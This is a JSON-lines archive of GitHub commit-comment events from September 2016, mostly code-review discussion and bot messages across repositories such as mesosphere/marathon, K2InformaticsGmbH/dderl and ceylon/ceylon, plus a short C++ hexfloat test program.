{"id":"4540480287","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18964119,"position":37,"line":92,"path":"docs/docs/rest-api/public/api/v2/types/mesosContainer.raml","commit_id":"beae72e92b14e2b15406cac9db77170abbc93ba2","created_at":"2016-09-09T14:46:37Z","updated_at":"2016-09-09T14:46:37Z","body":"I know the mesos guys are talking about task (container instance) restart\npolicy. Not sure what the priority of that is once MVP lands but it's\ndefinitely on the roadmap and makes pods more useful. Would likely be\ntrivial to add to a v2 lifecycle API\n\nOn Fri, Sep 9, 2016 at 10:33 AM, Jason Gilanfarr <notifications@github.com>\nwrote:\n\n> I feel like we're not realistically going to add more lifecycle stuff to\n> v2- maybe just embed the field? I'd love to have some magical way of\n> defaulting objects :/\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mesosphere/marathon/commit/beae72e92b14e2b15406cac9db77170abbc93ba2#commitcomment-18963932>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACPVLDLxDVcdy0apqURhxOnFPPwGF3r2ks5qoW5WgaJpZM4J5HOD>\n> .\n>\n"}},"created_at":"2016-09-09T14:46:37Z"}
{"id":"4540481526","type":"CommitCommentEvent","actor":{"login":"tysonclugg"},"repo":{"name":"yjmade/django-ddp"},"payload":{"comment":{"id":18964122,"position":null,"line":null,"path":null,"commit_id":"fc1ff6db653f99f46504cd2d8ed6055ccbb659f2","created_at":"2016-09-09T14:46:52Z","updated_at":"2016-09-09T14:46:52Z","body":"How are you ensuring that the threading library is monkey patched by gevent before it is imported by Django?"}},"created_at":"2016-09-09T14:46:52Z"}
{"id":"4540482929","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18964124,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-09T14:47:07Z","updated_at":"2016-09-09T14:47:07Z","body":"I think i have a dev bug report : allow template config to use assetdirectory specific.\r\n\r\nIn fact assets can be used to to separate 'static' files (we don't need cookies) and dynamic file (we need cookies) etc ...."}},"created_at":"2016-09-09T14:47:07Z"}
{"id":"4540485412","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964130,"position":7,"line":103,"path":"src/dderl_resource.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:47:32Z","updated_at":"2016-09-09T14:47:32Z","body":"use `imem_json:decode` we avoid using jsx directly"}},"created_at":"2016-09-09T14:47:32Z"}
{"id":"4540486000","type":"CommitCommentEvent","actor":{"login":"Ullfis"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":18964131,"position":null,"line":null,"path":null,"commit_id":"277f7cfa174e74cd4f3839df7e269ba0daee5047","created_at":"2016-09-09T14:47:38Z","updated_at":"2016-09-09T14:47:38Z","body":":+1:\r\n\r\n:partly_sunny: https://github.com/aurelia-ui-toolkits/aurelia-materialize-bridge/blob/277f7cfa174e74cd4f3839df7e269ba0daee5047/sample/src/nav-bar.html#L53"}},"created_at":"2016-09-09T14:47:38Z"}
{"id":"4540487313","type":"CommitCommentEvent","actor":{"login":"shamis"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964141,"position":3,"line":191,"path":"src/dderl.hrl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:47:51Z","updated_at":"2016-09-09T14:47:51Z","body":"No this has been changed in the next commit"}},"created_at":"2016-09-09T14:47:51Z"}
{"id":"4540493792","type":"CommitCommentEvent","actor":{"login":"MaximeKjaer"},"repo":{"name":"MaximeKjaer/kjaer.io"},"payload":{"comment":{"id":18964159,"position":null,"line":null,"path":null,"commit_id":"54c9813e5e12c5fbd146b8e1d4ae0be0f265ef09","created_at":"2016-09-09T14:49:00Z","updated_at":"2016-09-09T14:49:00Z","body":"https://xkcd.com/1553/"}},"created_at":"2016-09-09T14:49:00Z"}
{"id":"4540494814","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":18964163,"position":null,"line":null,"path":null,"commit_id":"a56ad11d6c6fd50147c5d4020f741db295287479","created_at":"2016-09-09T14:49:12Z","updated_at":"2016-09-09T14:49:12Z","body":"![screenshot001_zpsgl9hskhn](https://cloud.githubusercontent.com/assets/6500800/18391158/e2574f3e-7661-11e6-82a5-4cf74fd1ffb4.jpg)\r\n"}},"created_at":"2016-09-09T14:49:12Z"}
{"id":"4540497855","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964178,"position":24,"line":18,"path":"src/dderl_saml_handler.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:49:43Z","updated_at":"2016-09-09T14:49:43Z","body":"The `Path` parameter is not needed"}},"created_at":"2016-09-09T14:49:43Z"}
{"id":"4540500652","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18964198,"position":null,"line":null,"path":null,"commit_id":"94a5a4bd2b218dde447f44cb3ef62cf04f9d9a0f","created_at":"2016-09-09T14:50:14Z","updated_at":"2016-09-09T14:50:14Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-09T14:50:14Z"}
{"id":"4540500681","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18964200,"position":null,"line":null,"path":null,"commit_id":"351112b245ece9224a6871a5d6b886eef1c320aa","created_at":"2016-09-09T14:50:14Z","updated_at":"2016-09-09T14:50:14Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3917\n"}},"created_at":"2016-09-09T14:50:14Z"}
{"id":"4540501176","type":"CommitCommentEvent","actor":{"login":"adamisntdead"},"repo":{"name":"adamisntdead/FreeCodeJava"},"payload":{"comment":{"id":18964203,"position":3,"line":3,"path":"src/basicAlgorithmChallenges/FindTheLongestWordInAString.java","commit_id":"f4381f8623d19bbc6f254a89e79998bf04c7ee11","created_at":"2016-09-09T14:50:18Z","updated_at":"2016-09-09T14:50:18Z","body":"what? @oedesty "}},"created_at":"2016-09-09T14:50:18Z"}
{"id":"4540502196","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-ewilliamswtn"},"payload":{"comment":{"id":18964208,"position":null,"line":null,"path":null,"commit_id":"f126d0ca7f8428aee94140c3610f13c4bbe806fc","created_at":"2016-09-09T14:50:28Z","updated_at":"2016-09-09T14:50:28Z","body":"Update your gruntfile.js and check javascript with the jshint. \r\n\r\nAlso, you should have a file/folder structure representing the project. Take a look at the following and see if you can put your files into something similar. This habit will help long term and with bigger projects.\r\n![examplefolderstructure](https://cloud.githubusercontent.com/assets/4067527/18391187/c2beca1a-7672-11e6-9166-a995ca8a881d.png)\r\n"}},"created_at":"2016-09-09T14:50:28Z"}
{"id":"4540504986","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964214,"position":29,"line":20,"path":"src/dderl_saml_handler.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:50:55Z","updated_at":"2016-09-09T14:50:55Z","body":"No need to match to hardcoded `<<\"/saml\">>`. Cowboy routes ensures no other path get's here."}},"created_at":"2016-09-09T14:50:55Z"}
{"id":"4540516232","type":"CommitCommentEvent","actor":{"login":"Suleman-Tanveer"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":18964255,"position":null,"line":null,"path":null,"commit_id":"4bfbe6fa179a1e3c6e49260f7fa9a790d2b2a652","created_at":"2016-09-09T14:52:51Z","updated_at":"2016-09-09T14:52:51Z","body":"@sandarumk thanks for your help."}},"created_at":"2016-09-09T14:52:51Z"}
{"id":"4540520821","type":"CommitCommentEvent","actor":{"login":"newls"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":18964267,"position":52,"line":353,"path":"inc/apirest.class.php","commit_id":"daacda142ed18dc2a635833765bafb6104c2a321","created_at":"2016-09-09T14:53:36Z","updated_at":"2016-09-09T14:53:36Z","body":"Thanks People !\r\nI appreciate your fast reactions, I wasn't expecting it that fast !\r\nThanks for the solution, whatsoever \"I did my job\"."}},"created_at":"2016-09-09T14:53:36Z"}
{"id":"4540520842","type":"CommitCommentEvent","actor":{"login":"andreiroman"},"repo":{"name":"andreiroman/pyodbc"},"payload":{"comment":{"id":18964266,"position":null,"line":null,"path":null,"commit_id":"3a5c1add5515da3a2fd5e178079fd1b42ab81380","created_at":"2016-09-09T14:53:36Z","updated_at":"2016-09-09T14:53:36Z","body":"Not the most elegant fix "}},"created_at":"2016-09-09T14:53:36Z"}
{"id":"4540528674","type":"CommitCommentEvent","actor":{"login":"etabeta78"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18964286,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T14:54:58Z","updated_at":"2016-09-09T14:54:58Z","body":"General rule with localizations have been for ages to have the English as\nparent (and thus 8char limited) and the localized versions as clones with a\ng/f/i/s additional letter at the end of the clone (whose names can go up to\n16 letters)\n\nIn general I'd prefer to mostly stick to 8 chars, but I see improvements\ncould be done for instance to fruit machines if we only allow for\nexceptions in particular cases, for instance using sc4_gamename instead of\ncurrent sc4_gmnm...\n\n    f.\n\n\n\nOn Fri, Sep 9, 2016 at 4:21 PM, Michael Zapf <notifications@github.com>\nwrote:\n\n> It could help to build better memorable names especially when you have\n> software that has a numbering (1, 2, 3...) which takes away one character\n> position, or where you want to indicate localized versions (German, French,\n> international). Then you'll notice how few 8 characters can actually be. I\n> mean, I somehow did it for the ti99 list, but at the cost of some really\n> difficult letter combinations. It looks unnecessarily cryptic (initially I\n> thought it was due to some DOS 8.3 legacy).\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff#commitcomment-18963707>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI0qvAjkIS99btNoMLTFoYDqWnS2LAV7ks5qoWtVgaJpZM4J49Ta>\n> .\n>\n"}},"created_at":"2016-09-09T14:54:58Z"}
{"id":"4540531867","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18964297,"position":21,"line":53,"path":"docs/docs/rest-api/public/api/v2/types/mesosContainer.raml","commit_id":"beae72e92b14e2b15406cac9db77170abbc93ba2","created_at":"2016-09-09T14:55:29Z","updated_at":"2016-09-09T14:55:29Z","body":"the \"default\" is actually implemented by Mesos. Not sure that we want to override that here. If we did provide a default we'd want it to be the same for apps and pods. And perhaps configurable via command-line flag. But really I think that's all overkill and we should just let Mesos implement the defaulting behavior."}},"created_at":"2016-09-09T14:55:29Z"}
{"id":"4540533474","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964302,"position":86,"line":80,"path":"src/dderl_saml_handler.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:55:46Z","updated_at":"2016-09-09T14:55:46Z","body":"Check if `org` needs to be set. If it is mandatory, find out minimum configuration (e.g. if `name` can be []). Then whatever else is mandatory and not default empty please make it ddConf-igurable."}},"created_at":"2016-09-09T14:55:46Z"}
{"id":"4540535556","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18964313,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-09T14:56:08Z","updated_at":"2016-09-09T14:56:08Z","body":"Did you see my comment about Blue Dragon thing....and the dropchance?"}},"created_at":"2016-09-09T14:56:08Z"}
{"id":"4540539058","type":"CommitCommentEvent","actor":{"login":"Vad1mo"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964321,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:56:43Z","updated_at":"2016-09-09T14:56:43Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:56:43Z"}
{"id":"4540539655","type":"CommitCommentEvent","actor":{"login":"rasung"},"repo":{"name":"rasung/salejung"},"payload":{"comment":{"id":18964324,"position":null,"line":null,"path":null,"commit_id":"c8a87c1e762bcf63bce73b0ebdadb4939f201130","created_at":"2016-09-09T14:56:49Z","updated_at":"2016-09-09T14:56:49Z","body":"solve"}},"created_at":"2016-09-09T14:56:49Z"}
{"id":"4540539768","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18964325,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T14:56:50Z","updated_at":"2016-09-09T14:56:50Z","body":"* It's confusing. If someone takes the time to understand what `small` does everywhere else, they'll be mislead to think that the compiler does `(int) longValue`, but it doesn't. It also muddles the definition of `small`, which I expect will already be tough to learn and understand.\r\n* It re-centers the universe around Java, making all other platforms be the ones that are special cased\r\n* Importantly, there is no algorithmic or fundamental reason why 32-bits is *better* for this. This is a Java-specific issue, and generally the language does a great job at avoiding exposing platform specific details."}},"created_at":"2016-09-09T14:56:50Z"}
{"id":"4540541794","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964329,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:57:13Z","updated_at":"2016-09-09T14:57:13Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:57:13Z"}
{"id":"4540544873","type":"CommitCommentEvent","actor":{"login":"Vad1mo"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964338,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:57:43Z","updated_at":"2016-09-09T14:57:43Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:57:43Z"}
{"id":"4540546379","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964341,"position":39,"line":41,"path":"src/dderl_saml_handler.erl","commit_id":"9791e94455f3cedc1d8dc1e93ae66d325e40587a","created_at":"2016-09-09T14:57:59Z","updated_at":"2016-09-09T14:57:59Z","body":"Which part of code is using/triggering this block?"}},"created_at":"2016-09-09T14:57:59Z"}
{"id":"4540547374","type":"CommitCommentEvent","actor":{"login":"jakesden"},"repo":{"name":"jakesden/JakesDiscordBot"},"payload":{"comment":{"id":18964343,"position":13,"line":20,"path":"bot.py","commit_id":"ef7a39ef4cc83b4e47f77585ac39c5cd88426e0e","created_at":"2016-09-09T14:58:11Z","updated_at":"2016-09-09T14:58:11Z","body":"never works anyway, if you can find a way to have a command to list all emoji that would help"}},"created_at":"2016-09-09T14:58:11Z"}
{"id":"4540547544","type":"CommitCommentEvent","actor":{"login":"Vad1mo"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964344,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:58:13Z","updated_at":"2016-09-09T14:58:13Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:58:13Z"}
{"id":"4540550650","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964350,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:58:43Z","updated_at":"2016-09-09T14:58:43Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:58:43Z"}
{"id":"4540553512","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964358,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:59:13Z","updated_at":"2016-09-09T14:59:13Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:59:13Z"}
{"id":"4540553681","type":"CommitCommentEvent","actor":{"login":"ahashibon"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18964360,"position":259,"line":126,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-09T14:59:15Z","updated_at":"2016-09-09T14:59:15Z","body":"@mehdisadeghi yes there is a syntax error here, was thinking matlab like! the super_cell is a 3x3 matrix representing three raw vectors (i.e., each raw of the matrix is a vector), and we need to copy it as a list of raw vectors to the cuds box. "}},"created_at":"2016-09-09T14:59:15Z"}
{"id":"4540554559","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964362,"position":5,"line":191,"path":"src/dderl.hrl","commit_id":"059b3198e65cb02b7c417f7c7eb5d7cf44b15b76","created_at":"2016-09-09T14:59:22Z","updated_at":"2016-09-09T14:59:22Z","body":"The default value should be : \"http://idp.host.com/\""}},"created_at":"2016-09-09T14:59:22Z"}
{"id":"4540554732","type":"CommitCommentEvent","actor":{"login":"Dragon2488"},"repo":{"name":"Dragon2488/GT5-Unofficial"},"payload":{"comment":{"id":18964363,"position":null,"line":null,"path":null,"commit_id":"b25e7eaf129d0f3cb2af5685f8f57e6553f86d2d","created_at":"2016-09-09T14:59:24Z","updated_at":"2016-09-09T14:59:24Z","body":"Well, it isn't actually frozen, i implemented block models on ASM (which is strange)"}},"created_at":"2016-09-09T14:59:24Z"}
{"id":"4540556606","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964367,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T14:59:43Z","updated_at":"2016-09-09T14:59:43Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T14:59:43Z"}
{"id":"4540559249","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964370,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T15:00:14Z","updated_at":"2016-09-09T15:00:14Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T15:00:14Z"}
{"id":"4540562752","type":"CommitCommentEvent","actor":{"login":"Aristokrates"},"repo":{"name":"payment21/payment-gateway-apidocs"},"payload":{"comment":{"id":18964381,"position":null,"line":null,"path":null,"commit_id":"30b39cf056afde742610a8e3eaeee2fd6e1da869","created_at":"2016-09-09T15:00:43Z","updated_at":"2016-09-09T15:00:43Z","body":"__API Description file syntax error on line 405__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2016-09-09T15:00:43Z"}
{"id":"4540567532","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964387,"position":12,"line":20,"path":"src/dderl_saml_handler.erl","commit_id":"059b3198e65cb02b7c417f7c7eb5d7cf44b15b76","created_at":"2016-09-09T15:01:28Z","updated_at":"2016-09-09T15:01:28Z","body":"matching/processing path isn't required as cowboy router ensures it.\r\nalso https://github.com/K2InformaticsGmbH/dderl/commit/9791e94455f3cedc1d8dc1e93ae66d325e40587a#commitcomment-18964178"}},"created_at":"2016-09-09T15:01:28Z"}
{"id":"4540568857","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18964392,"position":null,"line":null,"path":null,"commit_id":"7a6c674a0614e579957aff625c76bf2c17eb4e9b","created_at":"2016-09-09T15:01:42Z","updated_at":"2016-09-09T15:01:42Z","body":"I tried to look at `DisintT.mpl` and (comparing the test results with and without this call to `value`) it seems that the relevant test is `d7_normalFB1`. But I'm confused both by the disintegration code and the other tests that are also failing, so it seems premature (or immature?) currently to track down what's putting an unwanted `Int` in a weight. Does it seems so to you too? Should I remove the call to `value` for now?"}},"created_at":"2016-09-09T15:01:42Z"}
{"id":"4540578617","type":"CommitCommentEvent","actor":{"login":"olibre"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18964408,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T15:03:23Z","updated_at":"2016-09-09T15:03:23Z","body":"Oula ! Je suis passé à côté.\r\nC'est une bonne question... Je ne sais pas !\r\n\r\nDu coup, j'ai cherché et j'ai complété mon code de test (ci-dessous) avec [`std::hexfloat`](http://en.cppreference.com/w/cpp/io/manip/fixed) et [`std::strtod()`](http://en.cppreference.com/w/cpp/string/byte/strtof).\r\n\r\nCela donne `0x2.8 -> 2.5` et `0x2.8f -> 2.55859375`.\r\n\r\nMais effectivement, la [TS *Hexadecimal floating literals for C++*](http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0245r1.html) est ambiguë a propos de `v = 0x2.8f` et `v = 2.5f`.\r\n\r\nCela mérite une question StackOverflow (ou une issue sur le repo Git du comité...)\r\nQu'en penses-tu ?\r\n\r\n```cpp\r\n#include <iostream>\r\n#include <cassert>\r\n#include <cstdlib>\r\n#include <sstream>\r\n#include <cstdio>\r\n//#include <stdio.h>\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n  std::cout.precision(99);\r\n  long double l;\r\n  double      d;\r\n  float       f;\r\n\r\n  switch (argc)\r\n  {\r\n  case 0:\r\n    assert(0 && \"Pas possible\");\r\n\r\n  case 1:\r\n    std::cout <<\"Usage: \"<< argv[0] <<\" 0xA.Bp-1                => Conversion hexfloat\" \"\\n\"\r\n                \"Usage: \"<< argv[0] <<\" Numerateur Denominateur => Calcule la fraction\" \"\\n\";\r\n    return 1;\r\n\r\n  case 2:\r\n      std::cout <<\"Decode floating point hexadecimal = \"<< argv[1];\r\n      //std::istringstream(argv[1]) >> std::hexfloat >> d;\r\n      l = std::strtold(argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtold() range error\";\r\n      d = std::strtod (argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtod() range error\";\r\n      f = std::strtof (argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtod() range error\";\r\n      break;\r\n\r\n  default:\r\n    {\r\n      int numerateur   = std::atoi(argv[1]);\r\n      int denominateur = std::atoi(argv[2]);\r\n      std::cout << \"fraction = \"<< numerateur <<'/'<< denominateur;\r\n      l = numerateur;\r\n      l /= denominateur;\r\n      f = d = l;\r\n    }\r\n  }\r\n\r\n  std::cout <<\"\\n\"  \"long double = \"<< std::defaultfloat << l <<'\\t'<< std::hexfloat << l\r\n            <<\"\\n\"  \"double      = \"<< std::defaultfloat << d <<'\\t'<< std::hexfloat << d\r\n            <<\"\\n\"  \"float       = \"<< std::defaultfloat << f <<'\\t'<< std::hexfloat << f\r\n            <<\"\\n\"  \"same  long double == double: \"<< std::boolalpha << (l == d)\r\n            <<\"\\n\"  \"----       double == float : \"<< std::boolalpha << (d == f) <<'\\n';\r\n\r\n//std::printf(\"long double = %LG\\t%LA\" \"\\n\"\r\n//            \"double      = %G\\t%A\"   \"\\n\"\r\n//            \"float       = %G\\t%A\"   \"\\n\", l, l, d, d, f, f);\r\n}\r\n```\r\n"}},"created_at":"2016-09-09T15:03:23Z"}
{"id":"4540582980","type":"CommitCommentEvent","actor":{"login":"c-bik"},"repo":{"name":"K2InformaticsGmbH/dderl"},"payload":{"comment":{"id":18964413,"position":39,"line":64,"path":"src/dderl_saml_handler.erl","commit_id":"059b3198e65cb02b7c417f7c7eb5d7cf44b15b76","created_at":"2016-09-09T15:04:09Z","updated_at":"2016-09-09T15:04:09Z","body":"use \":[0-9]+\" to replace any port.\r\nIsn't there a cowboy_req API which gives you only the host?"}},"created_at":"2016-09-09T15:04:09Z"}
{"id":"4540585491","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18964418,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T15:04:35Z","updated_at":"2016-09-09T15:04:35Z","body":"`small` by itself doesn't \"do\" _anything_. It's a *hint* to the compiler that it is allowed to do something if it so pleases, by a mechanism of its own choosing.\r\n\r\n> It re-centers the universe around Java,\r\n\r\nI don't see how that's true _at all_.\r\n\r\n> Importantly, there is no algorithmic or fundamental reason why 32-bits is better for this. \r\n\r\nSure there is! It's more memory efficient!"}},"created_at":"2016-09-09T15:04:35Z"}
{"id":"4540589442","type":"CommitCommentEvent","actor":{"login":"HappyRay"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18964424,"position":31,"line":115,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-09T15:05:17Z","updated_at":"2016-09-09T15:05:17Z","body":"If there are multiple errors, what would the result look like?"}},"created_at":"2016-09-09T15:05:17Z"}
{"id":"4540589759","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18964427,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T15:05:20Z","updated_at":"2016-09-09T15:05:20Z","body":"So languages that use 64-bits for hashes are doing it wrong?"}},"created_at":"2016-09-09T15:05:20Z"}
{"id":"4540590517","type":"CommitCommentEvent","actor":{"login":"mfine30"},"repo":{"name":"cloudfoundry/cf-mysql-release"},"payload":{"comment":{"id":18964432,"position":null,"line":null,"path":null,"commit_id":"6abffec0646689af996072a3215a1220dfbdb3b9","created_at":"2016-09-09T15:05:27Z","updated_at":"2016-09-09T15:05:27Z","body":"@menicosia This is the one for v26. It was cherrypicked from the v24 branch and ended up with the wrong story ID it seems. The branch at the top of the page where it says `releases/v26` is the source of truth."}},"created_at":"2016-09-09T15:05:27Z"}
{"id":"4540594857","type":"CommitCommentEvent","actor":{"login":"ahashibon"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18964442,"position":273,"line":140,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-09T15:06:16Z","updated_at":"2016-09-09T15:06:16Z","body":"it is in the add_MD branch in simphony_metadata"}},"created_at":"2016-09-09T15:06:16Z"}
{"id":"4540595236","type":"CommitCommentEvent","actor":{"login":"CheshireCoder8"},"repo":{"name":"ElementalKiss/TIL"},"payload":{"comment":{"id":18964444,"position":null,"line":null,"path":null,"commit_id":"394657f627ae58dcdddfd1e09aeb64a195c9c877","created_at":"2016-09-09T15:06:20Z","updated_at":"2016-09-09T15:06:20Z","body":"하 CGI 그거 90년대에서 2000년대 초에나 쓰던거 아니냐 생각할텐데요.\r\n\r\n믿기힘들겠지만,. 아직도 씨-지-아이를 사용하는 초고대의 서버가 인터넷 곳곳에 잠들어 있다고 하는 전설이 있답니다!"}},"created_at":"2016-09-09T15:06:20Z"}
